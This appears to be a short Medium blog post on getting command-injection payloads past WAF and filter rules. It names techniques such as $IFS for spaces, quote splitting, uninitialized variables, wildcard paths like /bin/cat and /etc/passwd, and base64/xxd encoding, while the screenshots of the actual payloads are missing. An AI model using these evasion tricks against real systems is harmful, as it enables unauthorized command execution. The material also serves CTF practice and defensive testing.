Remote Code Execution — Bypassing WAF and Filters

Welcome to the series

In this first series, I'll talk about bypassing simple rules. I'll be using a simple PHP script to mimic the vulnerabilities found in real life. This vulnerability is very easy to identify because this vulnerability is very limited to functions that pass input to the Operating System, i.e., pass-thru/system/shell in PHP or os. System and subprocess in python. In the real case, the script will be similar to the one below.

PHP Script to pass a variable into OS
Red for the first command and green for the second

Are you bypassing if "Space" is forbidden?

This might be the case if you're here because of CTF competition. In bash, you can use $IFS to replace space. IFS stands for Internal Field Separator, not only space, and this can help you if you're trying to substitute a new line, line separator, etc.

$IFS to replace space
{command,var} works fine

Bypassing WAF template matching or rules

As I mentioned before, Web Application Firewall and Filter have specific rules, and they will block you right away if you're trying to go with an exact payload like "bin/cat" or "etc/passwd." There are many ways we can play with this.

Use 'string' to wrap your payload.

You can split your payload, and it will work just fine!

Splitting payload

Use Uninitialized Variable

In bash, uninitialized variables count as null or no values, which might help us bypass the "template matching."

Using uninitialized variable

Use Regex Wildcard

This is the most interesting part, you can replace any character with the wild card, either (? . *) will work like a charm! To help you craft this payload, you can use the command -v till you get the command you are looking for. If the wildcard still returns two or more possibilities, it will execute each with the values given. It's okay, but it might result in an error in the curling process. For example, if you're trying to get a file's content, you might need to call /bin/cat. You can start trying with

It will list all possible results.
Wildcard works just fine

Maximizing Bash Features to your benefit

Well, there are too many ways you can bypass this template matching, but if by any chance you can use the "which" command, you can abuse its features to your benefit. I'll do two examples; base64 and xxd.

Which command to see if its exist
I use one wildcard “?”
XXD is Exist
It works!


It's almost impossible for Web Application Firewall to detect more evolving payload with just "Template Matching". Maybe it's time for you to move to Machine Learning Based- Web Application Firewall.



Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
jeremyah joel

jeremyah joel

I like an idea of breaking into something.